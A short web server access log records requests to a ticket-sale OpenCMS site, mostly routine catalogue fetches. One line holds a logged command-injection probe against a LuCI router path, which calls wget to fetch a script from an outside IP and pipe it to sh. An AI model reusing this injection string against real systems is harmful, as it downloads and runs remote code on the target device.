5.9.55.228 - - [28/Jun/2024:03:42:30 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A24D0DA7-71BD-F9A1-6BB3-71061AAB8BC1 HTTP/1.1" 200 86775
52.70.240.171 - - [28/Jun/2024:03:42:30 +0200] "GET /ticket2/opencms/it/buy/?catid=DA31441B-C568-3C77-D08C-698809032494&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78361
185.191.127.212 - - [28/Jun/2024:03:42:32 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F103.149.28.141%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
193.70.81.110 - - [28/Jun/2024:03:42:33 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=788963AF-9A89-75A3-2D87-6B3C9C1E0D23&sortorder=desc&column=price HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:42:34 +0200] "GET /ticket2/opencms/it/buy/?catid=43171577-14C8-6B19-25D9-DF372BFFCBFA&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78364
65.108.227.178 - - [28/Jun/2024:03:42:35 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=FB7F0AD6-8707-51F1-5AF9-A7E952D9C69E&sortorder=asc&column=section HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:03:42:38 +0200] "GET /ticket2/opencms/it/buy/?catid=8732E72C-A028-EA8C-4D4D-DEB44E2A28A8&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78363
